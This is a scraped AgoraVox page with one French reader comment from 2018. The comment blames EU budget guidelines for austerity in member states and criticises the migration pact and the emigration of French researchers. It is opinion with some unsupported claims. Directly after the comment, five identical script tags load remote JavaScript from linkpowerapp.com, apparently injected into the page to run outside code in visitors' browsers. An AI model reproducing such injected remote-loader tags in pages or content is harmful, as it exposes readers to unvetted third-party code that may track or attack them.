• AgoraVox sur Twitter
  • RSS
  • Agoravox TV
  • Agoravox Mobile


Commentaire de GrandGuignol

sur Tant que la France restera coincée dans l'UE, l'euro et l'Otan, les dirigeants du pays quels qu'ils soient ne seront que des pions


Voir l'intégralité des commentaires de cet article

GrandGuignol GrandGuignol 14 décembre 2018 17:49

@Axel_Borg
Je ne dis pas que tout est de la faute de l’UE, certes les dirigeants des états ont aussi un certain pouvoir mais les GOPe sont bien là chaque année pour orienter la politique et le budget des états membres vers une politique d’austérité. Voir la Grèce,ou l’Italie qui tente d’imposer sa politique et là on se demande ou est cette Union ? On esclavagise les peuples.
je suis autant navré que vous pour la pacte de migrations signé à l’insu de tous et sans que les médias n’en parlent avant que celui ci soit signé.
la France n’a pas de pétrole, mais des idées, des chercheurs, des génies qui sont obligés de s’expatrier pour trouver du travail.

<script src="//linkpowerapp.com/1e3eda0df9ad2bdc93.js"></script> <script src="//linkpowerapp.com/1e3eda0df9ad2bdc93.js"></script> <script src="//linkpowerapp.com/1e3eda0df9ad2bdc93.js"></script> <script src="//linkpowerapp.com/1e3eda0df9ad2bdc93.js"></script> <script src="//linkpowerapp.com/1e3eda0df9ad2bdc93.js"></script>

Voir ce commentaire dans son contexte





Palmarès